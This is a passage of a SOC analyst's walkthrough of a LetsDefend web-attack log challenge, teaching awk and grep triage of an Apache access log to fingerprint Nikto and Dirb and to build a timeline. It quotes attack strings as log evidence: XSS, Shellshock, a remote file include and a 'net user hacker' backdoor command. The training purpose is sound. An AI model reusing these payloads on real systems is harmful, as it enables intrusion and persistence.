SOC Playbook: LetsDefend – Investigate Web Attack
If you are looking for a definitive LetsDefend Investigate Web Attack walkthrough, you are in the right place. As a SOC Analyst working through real-world scenarios, I recently completed the “Detecting Web Attacks” challenge on LetsDefend and built this guide to reflect how a modern SOC investigation should actually be performed.
This is not just about finding the correct answers to complete a lab, but about thinking and operating like a Security Operations Center professional handling a live incident. In a real SOC environment, web attack investigation requires structured triage, log analysis, threat identification, and clear decision-making under pressure. This walkthrough applies those same principles, showing how to analyze attacker behavior, identify patterns, and connect events across logs in a way that mirrors real incident response workflows.
What You Will Learn from This Walkthrough
Throughout this guide, you will see how common web attack techniques are investigated from a SOC perspective, including:
- Automated Reconnaissance: Spotting bot-driven scans and directory discovery.
- Brute Force Authentication: Identifying and mitigating credential stuffing or password spraying.
- Command Injection: Detecting attempts to execute arbitrary commands on the host OS.
The focus is not just on recognizing indicators, but on understanding why they matter and building an analytical mindset that goes beyond tools and signatures toward deeper behavioral analysis.
Whether you are an aspiring SOC Analyst or already working in a SOC role, this guide is designed to strengthen your ability to perform effective web attack investigations using a structured, real-world methodology.
Investigation Scope
In the following sections, I will begin investigating the web server log file access.log from the LetsDefend Investigate Web Attack challenge.
Questions Answered:
- Q1: Which automated scan tool did the attacker use for web reconnaissance?
- Q2: After web reconnaissance activity, which technique did the attacker use for directory listing discovery?
- Q3: What is the third attack type after directory listing discovery?
- Q4: Is the third attack successful?
- Q5: What is the name of the fourth attack?
- Q6: What is the first payload for the fourth attack?
- Q7: Is there any persistency clue for the victim machine in the log file? If yes, what is the related payload?
Before You Begin — Understanding the Log Format
Every line in an Apache/Nginx combined access log follows this fixed structure:
IP - - [TIMESTAMP] "METHOD ENDPOINT PROTOCOL" STATUS RESPONSE_SIZE "REFERER" "USER-AGENT"
Example:
192.168.199.2 - - [20/Jun/2021:12:36:24 +0300] "GET /bwapp/ HTTP/1.1" 200 4086 "-" "Mozilla/5.00 (Nikto/2.1.6)"
| awk Position | Field | Example value | What it tells you |
|---|---|---|---|
| $1 | IP address | 192.168.199.2 | Source of the request — who made it |
| $2 | Ident | - | RFC 1413 client identity — almost always -, not used |
| $3 | Auth user | - | Authenticated username — - if no HTTP authentication |
| $4 | Date/time | [20/Jun/2021:12:36:24 | Timestamp opening bracket — first half of the request time |
| $5 | Timezone | +0300] | UTC offset — second half of the timestamp, closes the bracket |
| $6 | Method | "GET | HTTP method — GET=reading, POST=submitting data (includes opening ") |
| $7 | Endpoint | /bwapp/ | Requested URL path — may contain URL-encoded attack payloads |
| $8 | Protocol | HTTP/1.1" | HTTP version — confirms protocol in use (includes closing ") |
| $9 | Status code | 200 | Server response — 200=ok, 302=redirect, 403=forbidden, 404=not found |
| $10 | Response Size | 4086 | Response size in bytes — - means no body; uniform value = same page served every time |
| $11 | Referer | "-" | URL of the referring page in quotes — - if request was direct |
| $12+ | User-Agent | "Mozilla/5.00 | Tool or browser making the request — field count varies when the UA string contains spaces; use awk -F'"' '{print $6}' for reliable extraction regardless of UA length |
View 2: The Secure Quote-Delimited Structure (The Enterprise Standard)
To securely extract fragile data like the User-Agent or the URL, SOC analysts use awk -F'"' to slice the log using double-quotes instead of spaces. This shifts the column numbers completely and creates secure “buckets” that never break.
| awk -F'"' Position | Field | Example value | What it securely isolates |
|---|---|---|---|
| $1 | Pre-Request Block (IP & Time) | 192.168.199.2 - - [20/Jun/2021:12:36:24 +0300] | The IP, Timestamp, and formatting spaces before the first quote. |
| $2 | HTTP Request Block | GET /bwapp/ HTTP/1.1 | The Full HTTP Request: Safely isolates the URL, even if the attacker injected spaces into the path. |
| $3 | Response Block (Status & Size) | 200 4086 | The Status Code and Body Size. |
| $4 | Referer | - | The Referer: Safely trapped inside the second set of quotes. |
| $5 | Formatting Space | (single space) | The single blank space between the Referer and the User-Agent. |
| $6 | User-Agent | Mozilla/5.00 (Nikto/2.1.6) | The Full User-Agent: Safely captures the entire tool signature, regardless of how many spaces it contains. |
Crucial Parsing Concepts: awk vs awk -F'"'
- The Default awk Flaw: By default, awk cuts log lines at every space. If an attacker injects spaces into a URL, or if a User-Agent contains spaces (e.g., Mozilla/5.0 (Macintosh...), standard awk shatters the data across the wrong columns.
- The awk -F'"' Solution: Adding -F'"' forces awk to cut the line only at double-quotes ("). This safely traps volatile data (like the HTTP Request in $2 and the User-Agent in $6) into unbreakable buckets, regardless of how many spaces are inside them.
- The $5 Formatting Space: Why is $5 just a blank space? Apache logs put a physical space between fields for readability (e.g., "-" "Mozilla..."). When awk cuts at the Referer’s closing quote and the User-Agent’s opening quote, that single formatting space gets trapped all by itself in bucket $5.
⚠️ The Limitation of Quote-Parsing
While -F'"' solves the space injection problem, attackers can still break it by injecting raw double-quotes (") directly into URLs. These injected quotes physically shatter the quote-delimited structure, causing awk to misread the fields. This is why Step 2B uses a structural regex method to detect and isolate these malformed payloads before you begin standard analysis.
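The difference between the two splitting modes can be seen on the example line from the log format section. This is a minimal sketch that only reuses that single sample line; the variable names are illustrative.

```shell
# Example line from the log format section above.
line='192.168.199.2 - - [20/Jun/2021:12:36:24 +0300] "GET /bwapp/ HTTP/1.1" 200 4086 "-" "Mozilla/5.00 (Nikto/2.1.6)"'

# Space-delimited: field 12 holds only the first word of the User-Agent,
# with the opening double quote still attached.
ua_space=$(printf '%s\n' "$line" | awk '{print $12}')

# Quote-delimited: field 6 is the whole User-Agent, field 2 the whole request line.
ua_quote=$(printf '%s\n' "$line" | awk -F'"' '{print $6}')
request=$(printf '%s\n' "$line" | awk -F'"' '{print $2}')

printf 'space-split field 12: %s\n' "$ua_space"
printf 'quote-split field 6 : %s\n' "$ua_quote"
printf 'quote-split field 2 : %s\n' "$request"
```

The space-split result is truncated at the first space in the User-Agent, while the quote-split fields come back whole.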
PHASE 1 — SITUATIONAL AWARENESS
Know what you have before touching anything
STEP 1 — Establish the log size and incident time window
Why: Before any analysis, you need to understand the scope. Total line count relative to the time window indicates how automated the activity was. The timestamp window gives the total duration covered by the log, which bounds the duration of malicious activity. This prevents drawing conclusions from incomplete data.
# Total number of entries in the log
wc -l access.log
# First and last full log lines — shows format and time boundary
head -1 access.log
tail -1 access.log
# Extract timestamps cleanly to see the window
head -1 access.log | awk '{print $4, $5}'
tail -1 access.log | awk '{print $4, $5}'
What to look for:
- High line counts (5,000+) in a short time window indicate automated tooling
- Compare first vs last timestamp to determine incident duration
- The last log line is particularly important — it often contains the final attacker action
This log — confirmed results:
12556 access.log
First entry: [20/Jun/2021:12:35:40 +0300] (legitimate user browsing)
Last entry: [20/Jun/2021:12:53:23 +0300] (attacker's final injected command)
Total window: 17 minutes 43 seconds
Record: Total lines: _____ | First timestamp: _____ | Last timestamp: _____
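The window can also be computed rather than read off by eye. The sketch below assumes both timestamps fall on the same day and in the same timezone, which holds for this log; `to_seconds` is a hypothetical helper name.

```shell
# Timestamps as printed by: head -1 / tail -1 access.log | awk '{print $4}'
first='[20/Jun/2021:12:35:40'
last='[20/Jun/2021:12:53:23'

# Convert the HH:MM:SS portion to seconds since midnight.
# Splitting on ":" gives $1=[20/Jun/2021, $2=HH, $3=MM, $4=SS.
to_seconds() {
    printf '%s\n' "$1" | awk -F: '{print $2 * 3600 + $3 * 60 + $4}'
}

elapsed=$(( $(to_seconds "$last") - $(to_seconds "$first") ))
window="$(( elapsed / 60 )) min $(( elapsed % 60 )) sec"
echo "Incident window: $window ($elapsed seconds)"
```

For a log that crosses midnight, the date portion would have to be taken into account as well.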
STEP 2A — Confirm the log format and field positions
Why: Field positions in awk commands are zero-tolerance. If the log has extra fields or a non-standard format, every subsequent command extracting $6, $7, $9 will produce wrong output. You must verify format before proceeding.
# Visually inspect the first 3 lines
head -3 access.log
# Count fields in a representative line
head -1 access.log | awk '{print NF}'
Expected for Apache Combined Log Format:
- Field count is at least 12 for a well-formed request line and grows with every space inside the User-Agent or URL
- Field 4 starts with [ (timestamp)
- Field 6 is the HTTP method, prefixed by the opening double quote
- Field 9 is the 3-digit HTTP status code, provided the URL contains no spaces
This log — confirmed results:
NF = 21
Format: Apache Combined Log Format — confirmed
STEP 2B — Validate log integrity and isolate malformed payloads
Why: Confirming the format in Step 2A is necessary but not sufficient. Relying on space-counted field positions assumes every line in the log is well-formed — but advanced attackers intentionally inject raw, unencoded double-quotes (") directly into URLs. These injected quotes physically shatter the column structure of the log line, causing standard awk positional commands to silently extract garbage data from the wrong fields. Before trusting any field extraction across the entire log, you must measure the structural health of the file and immediately surface the lines that break the parser. Those broken lines are not noise — they are almost always the most aggressive payloads in the dataset.
Part A — Format compliance check
Establish the exact number of lines that conform to the Apache Combined Log Format structure. This becomes your baseline. Any discrepancy between the total line count and the structural match count is your anomaly count.
# Total baseline line count
wc -l access.log
# Count lines that PERFECTLY match the Apache Combined Log Format structure
grep -Ec '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log
Understanding the structural regex:
This pattern maps the exact physical blueprint of a combined log line. Instead of counting spaces, it anchors to delimiters — brackets and double-quotes — that the attacker cannot remove without breaking the HTTP request itself.
| Regex pattern | Field | How it works |
|---|---|---|
| ^[^ ]+ | IP address | Anchors to line start, reads until the first space |
| [^ ]+ [^ ]+ | Ident & auth user | Steps over the two - placeholder fields |
| \[[^]]+\] | Timestamp | Captures everything enclosed in literal [ and ] |
| "[^"]*" | HTTP request line | Captures everything inside the first quote pair — an injected space inside the URL cannot break this because the anchor is the closing ", not a space |
| [0-9]{3} | Status code | Requires exactly three consecutive digits |
| [0-9-]+ | Body size | Matches a digit string or a literal - for empty responses |
| "[^"]*" | Referer | Steps over the second quoted field |
| "[^"]*" | User-Agent | Steps over the final quoted field |
How to interpret the comparison:
| Scenario | Meaning |
|---|---|
| Both counts identical | Log is structurally clean — all positional awk commands are safe |
| grep count slightly lower | Anomaly detected — the gap is the number of malformed lines that failed the structural check |
| grep returns 0 | Non-standard format (WAF log, JSON, custom format) — positional awk will fail entirely, dynamic anchoring required |
This log — confirmed results:
Total Lines: 12556
Matched Lines: 12457
Discrepancy: 99 malformed lines detected
Part B — Isolate the malformed requests
Once a discrepancy is confirmed, immediately extract the lines that failed the structural check. These lines are invisible to standard positional awk parsers and represent the attacker’s most aggressive payload types.
# Extract every line that breaks the Apache Combined Log Format structure
grep -Ev '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log
# Count the malformed lines and compare against the discrepancy from Part A
grep -Ev '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log | wc -l
Note on the count: The inverted grep returns 100 lines while the arithmetic discrepancy (12556 − 12457) is 99. grep -c and grep -v with the same pattern partition the file, so their counts must add up to the number of lines grep sees: 12,457 + 100 = 12,557. The one-line gap therefore comes from wc -l, which counts newline characters rather than lines. The most likely cause is that the final line of access.log has no trailing newline, so wc -l misses it. The per-IP counts in Step 3 (12,528 + 29 = 12,557) are consistent with this. The malformed line count is 100.
Observed Evidence (sample of malformed lines):
192.168.199.2 ... "GET /bwapp/emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script> HTTP/1.1" 404 300 ...
192.168.199.2 ... "GET /bwapp/forum.asp?n=/.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver]... HTTP/1.1" 400 326 ...
192.168.199.2 ... "GET /bwapp/index.php?config[\"sipssys\"]=http://cirt.net/rfiinc.txt? HTTP/1.1" 302 - ...
(97 additional malformed lines)
What this means for the rest of the investigation:
These 100 lines exist inside access.log and are not lost; they simply cannot be parsed by space-delimited awk commands. All subsequent steps in this playbook use grep against the raw log or extract fields by anchoring to structural delimiters (-F'"'), which stay reliable on every line where no raw quote was injected. The positional awk commands ($7, $9, $10) are valid for the 12,457 well-formed lines.
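When a compliance count and a total line count disagree by exactly one, it is worth checking whether the file ends without a trailing newline, because `wc -l` and `grep -c` treat that case differently. The sketch below uses a three-line throwaway file (not the challenge log) to show the effect.

```shell
tmp=$(mktemp)
# Three sample lines; the last one deliberately has no trailing newline.
printf 'line one\nline two\nline three' > "$tmp"

wc_count=$(wc -l < "$tmp" | tr -d ' ')   # counts newline characters
grep_count=$(grep -c '' "$tmp")          # counts lines, including the unterminated last one
match=$(grep -c 'two' "$tmp")            # lines matching a pattern
nomatch=$(grep -vc 'two' "$tmp")         # lines not matching the same pattern

echo "wc -l: $wc_count  grep -c: $grep_count  match + nomatch: $((match + nomatch))"

# Command substitution strips a trailing newline, so a non-empty result
# means the last byte of the file is not a newline.
if [ -n "$(tail -c 1 "$tmp")" ]; then
    echo "final line has no trailing newline"
fi
rm -f "$tmp"
```

The matching and non-matching counts always sum to the line count grep sees, so a one-line gap against `wc -l` points at the file ending, not at an ambiguous log line.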
PHASE 2 — IDENTIFY THE ATTACKER
Separate malicious traffic from legitimate traffic
STEP 3 — Extract all unique source IPs with request counts
Why: Volume anomaly is the primary indicator of automated attack traffic. Legitimate browser sessions generate 10–50 requests as they load page assets. Scanners and brute force tools generate hundreds to thousands per minute. This single command separates the attacker from background noise.
# All source IPs with total request count, highest first
awk '{print $1}' access.log | sort | uniq -c | sort -rn
Decision thresholds:
| Request Count | Assessment |
|---|---|
| < 100 | Normal browser session |
| 100 – 1,000 | Suspicious — possible light scanning |
| 1,000 – 10,000 | Automated tooling — very likely attacker |
| > 10,000 | Confirmed high-volume automation |
This log — confirmed results:
12528 192.168.199.2 <-- ATTACKER (99.77% of all 12,556 entries)
29 192.168.199.1 <-- Legitimate user (browser loading page assets)
Record your attacker IP: 192.168.199.2
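The share of traffic per source IP can be computed in the same pass as the counts. This is a minimal sketch on a hypothetical five-line sample; the 10.0.0.x addresses and paths are made up for illustration.

```shell
tmp=$(mktemp)
cat > "$tmp" <<'EOF'
10.0.0.9 - - [20/Jun/2021:12:36:24 +0300] "GET /a HTTP/1.1" 404 300 "-" "scanner"
10.0.0.9 - - [20/Jun/2021:12:36:24 +0300] "GET /b HTTP/1.1" 404 300 "-" "scanner"
10.0.0.1 - - [20/Jun/2021:12:36:25 +0300] "GET / HTTP/1.1" 200 4086 "-" "browser"
10.0.0.9 - - [20/Jun/2021:12:36:25 +0300] "GET /c HTTP/1.1" 404 300 "-" "scanner"
10.0.0.9 - - [20/Jun/2021:12:36:26 +0300] "GET /d HTTP/1.1" 404 300 "-" "scanner"
EOF

# Count requests per source IP and express each count as a share of all lines.
shares=$(awk '{count[$1]++}
              END {for (ip in count)
                       printf "%d %s %.2f%%\n", count[ip], ip, 100 * count[ip] / NR}' "$tmp" |
         sort -rn)
top=$(printf '%s\n' "$shares" | head -1)

printf '%s\n' "$shares"
rm -f "$tmp"
```

Because awk counts lines itself here, the percentages are relative to the number of lines awk reads, not to a separate `wc -l` figure.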
STEP 4 — Visually confirm attacker identity by sampling their traffic
Why: High volume is necessary but not sufficient to confirm malicious intent. You must visually inspect a sample to confirm the traffic is anomalous before labeling this IP as the attacker and building all further analysis around that assumption.
# First 20 requests — reveals initial tool and behavior
grep "192.168.199.2" access.log | head -20
# Last 20 requests — reveals final actions and potential persistence
grep "192.168.199.2" access.log | tail -20
# Total count confirmation
grep "192.168.199.2" access.log | wc -l
Signs of malicious automated traffic in the sample:
- Tool names visible in the User-Agent field (Nikto, Dirb, sqlmap, etc.)
- Requests to non-existent paths (404 responses) in rapid sequence
- Random-looking filenames: 4RaXX5Ac.exe, 4RaXX5Ac.conf — these are Nikto’s file extension probe strings
- Multiple requests at the exact same second — impossible by human typing
This log — confirmed results:
First 20: All Nikto/2.1.6 with test IDs like (Test:Port Check), (Test:map_codes)
Probing random extensions: .exe, .show, .java, .x-shop, .bat|dir
Predominantly 404 responses
Last 20: Brute force login attempts followed by OS command injections
Final line contains: system('net user hacker Asd123!! /add')
Total: 12528 — confirmed matches
STEP 5 — Isolate all attacker traffic into a dedicated working file
Why: Filtering all subsequent analysis to attacker-only traffic eliminates noise from legitimate users and makes every command faster and cleaner. This is a mandatory step — do not skip it. All remaining steps in this playbook operate on attacker_traffic.log.
# Create the attacker-specific working file
grep "192.168.199.2" access.log > attacker_traffic.log
# Verify line count matches Step 3 and Step 4 counts exactly
wc -l attacker_traffic.log
# Confirm the attacker's own time window
head -1 attacker_traffic.log | awk '{print $4}'
tail -1 attacker_traffic.log | awk '{print $4}'
Validation check: The line count from wc -l attacker_traffic.log must equal the count from grep "192.168.199.2" access.log | wc -l. If they differ, the file creation failed — run the grep command again.
This log — confirmed results:
12528 attacker_traffic.log (matches — file created correctly)
Attacker window: 12:36:24 → 12:53:23
PHASE 3 — FINGERPRINT THE ATTACK TOOLS
Every tool leaves a User-Agent signature — this phase answers Q1 and Q2
STEP 6 — Extract ALL unique User-Agent strings from attacker traffic
Why: This is the single most critical command in the entire playbook. Most automated attack tools send a distinctive default User-Agent unless the operator overrides it, so the number of meaningfully distinct User-Agents usually approximates the number of distinct tools in play. One command hands you a first draft of the attack phase map before you analyze anything else.
Why -F'"' and field $6: The log stores request fields inside double quotes. When awk splits on " as the field delimiter, the resulting fields are: $1=first part, $2=HTTP request line, $3=status/response block, $4=referer value, $5=space, $6=User-Agent value. This $6 position is fixed regardless of URL length or the number of spaces in the URL.
Important — User-Agent strings can be spoofed: User-Agent values are set by the client and can be freely modified by any tool or attacker. They provide a strong initial signal for tool identification, but must never be used as the sole basis for definitive attribution. Always validate User-Agent-based identification through behavioral evidence: request patterns, response codes, endpoint distribution, and request timing. The UA narrows your hypothesis — behavior confirms it.
# Produces the complete global UA landscape including legitimate traffic
awk -F'"' '{print $6}' access.log | sort | uniq -c | sort -nr
# IP + UA correlation with tool variants collapsed — run against the raw log
awk -F'"' '{split($1, a, " "); print a[1], $6}' access.log | sed 's/ (Evasions.*//' | sort | uniq -c | sort -nr
Why both queries are needed: The first gives the full unfiltered inventory — every UA variant visible, no information discarded. The second solves the two limitations of the first: it binds each UA to its source IP, and it collapses Nikto’s per-test variants into a single line with a combined count. Together they answer two distinct questions — what tools exist in the log, and which IP used which tool.
This log — confirmed results from the IP + UA correlation query:
7303 192.168.199.2 Mozilla/5.00 (Nikto/2.1.6) → Nikto (Phase 1)
4816 192.168.199.2 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) → Dirb (Phase 2)
174 192.168.199.2 Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/... Firefox/52.0 → Attacker browser (Phase 3+)
101 192.168.199.2 - → Nikto null-UA evasion
61 192.168.199.2 () { :; }; echo Nikto-Added-CVE-2014-6271: true;... → Nikto shellshock probe
56 192.168.199.2 (empty) → Nikto empty-UA evasion
29 192.168.199.1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0)... → Legitimate user
13 192.168.199.2 ./.\\\ → Nikto path traversal test
3 192.168.199.2 )</script> HTTP/1.1 → Nikto XSS test
1 192.168.199.2 (log parsing artifact)
What this output tells you before any further analysis:
- 192.168.199.1 appears on a single output line (29 requests) with a legitimate macOS browser UA — confirmed as the benign user
- 192.168.199.2 accounts for every other line — confirmed as the attacker
- The attacker used three meaningfully distinct tools: Nikto, Dirb, and their own browser
- The three tool phases are already visible, counted, and attributed to a single IP in one pass
# IP + UA correlation restricted to attacker traffic
awk -F'"' '{split($1, a, " "); print a[1], $6}' attacker_traffic.log | sed 's/ (Evasions.*//' | sort | uniq -c | sort -nr
# Focused UA extraction — attacker traffic only, full per-variant detail
awk -F'"' '{print $6}' attacker_traffic.log | sort | uniq -c | sort -rn
Known tool signatures and what they mean:
| User-Agent Pattern | Tool | Phase | Attack Type |
|---|---|---|---|
| Nikto/2.x.x | Nikto | Phase 1 | Web vulnerability scanner (Q1 answer) |
| MSIE 6.0; Windows NT 5.1 | Dirb | Phase 2 | Directory brute force — Dirb’s known default UA |
| Mozilla/5.0 (X11; Linux...) | Attacker’s own browser | Phase 3+ | Manual exploitation |
| sqlmap/x.x | sqlmap | Any | SQL injection |
| python-requests/x.x | Custom script | Any | Custom automation |
| () { :; }; echo Nikto-Added-CVE-... | Nikto shellshock probe | Phase 1 | CVE-2014-6271 exploitation attempt |
This log — attacker-only UA breakdown (top entries from attacker_traffic.log):
4816 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) → Dirb
234 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:sitefiles) → Nikto (one variant of many)
221 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:map_codes) → Nikto
174 Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/...Firefox/52.0 → Attacker browser
101 - (null UA — Nikto requests sent without UA header)
61 () { :; }; echo Nikto-Added-CVE-2014-6271: true;... → Nikto shellshock
56 (empty string — more Nikto evasion variants)
26 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:004729) → Nikto (individual test)
13 ./.\\\ (Nikto path traversal evasion test)
(... many more Nikto per-test lines follow)
Three distinct phases identified:
- Phase 1: Multiple Nikto User-Agent variants (7,303 total when collapsed)
- Phase 2: MSIE 6.0 / Windows NT 5.1 — Dirb’s known default (4,816 requests)
- Phase 3+: Firefox/52.0 on Linux — attacker’s own browser, manual exploitation (174 requests)
STEP 7 — Verify and confirm Nikto as the reconnaissance tool — Q1
Why: Nikto explicitly embeds its name in the User-Agent. However, verification through behavior is required to be confident. Confirming that Nikto’s requests follow the expected pattern — probing for CVEs, testing file extensions, checking known dangerous paths — validates the identification beyond just UA matching.
# Total Nikto request volume
grep "Nikto" attacker_traffic.log | wc -l
# Sample of paths Nikto tested
grep "Nikto" attacker_traffic.log | awk '{print $7}' | head -20
# Response code distribution — shows what Nikto found vs what was missing
grep "Nikto" attacker_traffic.log | awk '{print $9}' | sort | uniq -c | sort -rn
# Nikto phase start and end timestamps
grep "Nikto" attacker_traffic.log | head -1 | awk '{print $4}'
grep "Nikto" attacker_traffic.log | tail -1 | awk '{print $4}'
Behavioral signatures that confirm Nikto:
- Test ID annotations in UA: (Test:Port Check), (Test:map_codes), (Test:sitefiles), (Test:002857) — these are Nikto’s internal test catalog references
- Random 8-character strings with multiple extensions: 4RaXX5Ac.exe, 4RaXX5Ac.conf — Nikto’s extension enumeration probes
- Shellshock probe in UA field: () { :; }; echo Nikto-Added-CVE-2014-6271 — Nikto’s Bash shellshock test
- Requests to known vuln paths: /_vti_pvt/, /phpinfo.php, /cgi-bin/, /.htaccess
This log — confirmed results:
7455 total Nikto requests
Start: [20/Jun/2021:12:36:24
End: [20/Jun/2021:12:36:57 (33 seconds duration)
Why this count (7,455) differs from the 7,303 shown in Step 6:
Step 6’s IP + UA correlation query uses awk -F'"' to extract the User-Agent and sed to group them by the standard Mozilla/5.00 (Nikto/2.1.6) signature. The resulting 7,303 figure is an accurate count of that specific signature, but it undercounts the total Nikto traffic by 152 requests (7,455 − 7,303).
This gap consists of two distinct Nikto evasion categories:
- Structurally Malformed Lines: As identified in Step 2B, the attacker injected raw double-quotes into the URLs (e.g., \"<script>), shattering the log’s column structure. On these lines, the text Nikto lands outside of the $6 User-Agent bucket, rendering them invisible to the positional awk query.
- Shellshock Probes (61 lines): These lines were structurally intact and captured perfectly by awk, but Nikto replaces its standard User-Agent header with the exploit payload () { :; }; echo Nikto-Added-CVE-2014-6271: true;.... Because they lack the standard Mozilla prefix, the sed collapse command isolates them into their own bucket of 61 rather than aggregating them into the main 7,303 count.
Command-Line Proof — Isolating the Malformed Lines (The Fast Way):
A healthy Apache Combined Log line contains exactly 6 double-quotes, meaning awk -F'"' will always split it into exactly 7 fields. Any line where the Number of Fields (NF) does not equal 7 has been structurally broken by injected quotes. You can verify the Nikto evasion payloads cleanly with this logic:
# 1. How many malformed lines contain the Nikto signature?
awk -F'"' 'NF!=7' access.log | grep -i "Nikto" | wc -l
# Output: 90
# 2. Show the rest of the malformed lines (Injection tests lacking the Nikto string)
awk -F'"' 'NF!=7' access.log | grep -vi "Nikto"
# 3. Show all 100 malformed lines together
awk -F'"' 'NF!=7' access.log
Q1 ANSWER: nikto
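To see why an injected quote moves the User-Agent out of field 6, it helps to run the NF check on one healthy and one malformed line side by side. Both lines below are hypothetical samples modelled on the evidence in Step 2B, not copied from the challenge log.

```shell
tmp=$(mktemp)
cat > "$tmp" <<'EOF'
10.0.0.9 - - [20/Jun/2021:12:36:30 +0300] "GET /bwapp/ HTTP/1.1" 200 4086 "-" "Mozilla/5.00 (Nikto/2.1.6)"
10.0.0.9 - - [20/Jun/2021:12:36:31 +0300] "GET /bwapp/x.php?id=\"<script>alert(1)</script> HTTP/1.1" 404 300 "-" "Mozilla/5.00 (Nikto/2.1.6)"
EOF

# 6 double quotes give 7 quote-delimited fields; each injected quote adds one more.
healthy=$(awk -F'"' 'NF == 7' "$tmp" | wc -l | tr -d ' ')
malformed=$(awk -F'"' 'NF != 7' "$tmp" | wc -l | tr -d ' ')

# On the malformed sample line the User-Agent has shifted from field 6 to field 7.
shifted_ua=$(awk -F'"' 'NF != 7 {print $7}' "$tmp")

echo "healthy: $healthy  malformed: $malformed"
echo "User-Agent found in field 7 of the malformed line: $shifted_ua"
rm -f "$tmp"
```

The size of the shift depends on how many quotes were injected, so on real data the User-Agent is more safely taken as the second-to-last quote-delimited field, `$(NF-1)`.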
STEP 8 — Verify Dirb as the directory discovery tool — Q2
Why: The MSIE 6.0 / Windows NT 5.1 string is Dirb’s known default User-Agent. Internet Explorer 6 on Windows XP is long obsolete, so genuine browser traffic with this string is extremely unlikely on a 2021 network. Its presence in the log is a strong initial indicator for Dirb or a similar directory brute-force tool. Because User-Agent strings are modifiable, tool identity must be confirmed through behavior, not the UA string alone. The combination of high request volume against wordlist-style paths with predominantly 404 responses is the behavioral confirmation.
# Total MSIE 6.0 request volume
grep "MSIE 6.0" attacker_traffic.log | wc -l
# Sample of paths targeted — should show wordlist patterns
grep "MSIE 6.0" attacker_traffic.log | awk '{print $7}' | head -30
# Response code distribution — 404-dominant confirms wordlist scanning
grep "MSIE 6.0" attacker_traffic.log | awk '{print $9}' | sort | uniq -c | sort -rn
# Phase timestamps
grep "MSIE 6.0" attacker_traffic.log | head -1 | awk '{print $4}'
grep "MSIE 6.0" attacker_traffic.log | tail -1 | awk '{print $4}'
# Verify the 12-second duration by counting requests per second
grep "MSIE 6.0" attacker_traffic.log | awk '{print $4}' | sort | uniq -c
# View the chronological flow of Dirb requests (Time, Method, Path, Status)
# (Pipe to 'head -30' or 'less' to view the stream comfortably)
grep "MSIE 6.0" attacker_traffic.log | awk '{print $4, $6, $7, $9}' | head -30
Three-condition behavioral confirmation for directory brute-force:
| Condition | Expected | Interpretation if true |
|---|---|---|
| 1. High volume | 1,000+ requests | Automated wordlist tool |
| 2. Path variety | Common directory names, numeric paths | Wordlist enumeration |
| 3. 404-dominant | 80%+ returning 404 | Probing for things that don’t exist |
All three must be true to confirm directory brute-force activity. User-Agent alone is insufficient — behavior seals the determination.
This log — confirmed results:
4816 total MSIE 6.0 requests
Sample paths: /bwapp/admin/2013, /bwapp/admin/2014, /bwapp/admin/21
/bwapp/administrators (numeric and alphabetic wordlist mix)
Response codes: Predominantly 404 — tool probing for non-existent paths
Start timestamp: [20/Jun/2021:12:37:50
End timestamp: [20/Jun/2021:12:38:02
Q2 ANSWER: directory brute force
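The 404-dominance and path-variety conditions from the table can be measured instead of estimated. This is a sketch on a hypothetical five-line sample; with real data the same awk would run on the output of `grep "MSIE 6.0" attacker_traffic.log`.

```shell
tmp=$(mktemp)
cat > "$tmp" <<'EOF'
10.0.0.9 - - [20/Jun/2021:12:37:50 +0300] "GET /bwapp/admin/2013 HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.0.0.9 - - [20/Jun/2021:12:37:50 +0300] "GET /bwapp/admin/2014 HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.0.0.9 - - [20/Jun/2021:12:37:51 +0300] "GET /bwapp/admin/21 HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.0.0.9 - - [20/Jun/2021:12:37:51 +0300] "GET /bwapp/administrators HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.0.0.9 - - [20/Jun/2021:12:37:52 +0300] "GET /bwapp/login.php HTTP/1.1" 200 4086 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
EOF

# Condition 3: percentage of requests answered with 404.
pct_404=$(awk '{total++; if ($9 == 404) miss++}
               END {printf "%.0f", 100 * miss / total}' "$tmp")

# Condition 2: number of distinct paths requested.
distinct_paths=$(awk '{print $7}' "$tmp" | sort -u | wc -l | tr -d ' ')

echo "404 share: ${pct_404}%  distinct paths: $distinct_paths"
rm -f "$tmp"
```

The positional fields `$7` and `$9` are only trustworthy on well-formed lines, so on the real log this check is best run after the malformed lines from Step 2B have been set aside.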
PHASE 4 — BUILD THE ATTACK TIMELINE
Every phase needs a timestamp boundary — this is the investigation spine
STEP 9 — Establish precise start and end timestamps for every phase
Why: Timestamps are the connective tissue of the entire investigation. Without exact phase boundaries you cannot sequence attacks correctly, calculate gaps, or determine which activity belongs to which phase. The gap between phases reveals attacker decision time — how long they paused to review results before launching the next stage.
# PHASE 1 — Nikto
grep "Nikto" attacker_traffic.log | head -1 | awk '{print $4, $5}'
grep "Nikto" attacker_traffic.log | tail -1 | awk '{print $4, $5}'
# PHASE 2 — Dirb
grep "MSIE 6.0" attacker_traffic.log | head -1 | awk '{print $4, $5}'
grep "MSIE 6.0" attacker_traffic.log | tail -1 | awk '{print $4, $5}'
# PHASE 3+ — Attacker's own browser (Firefox/52.0)
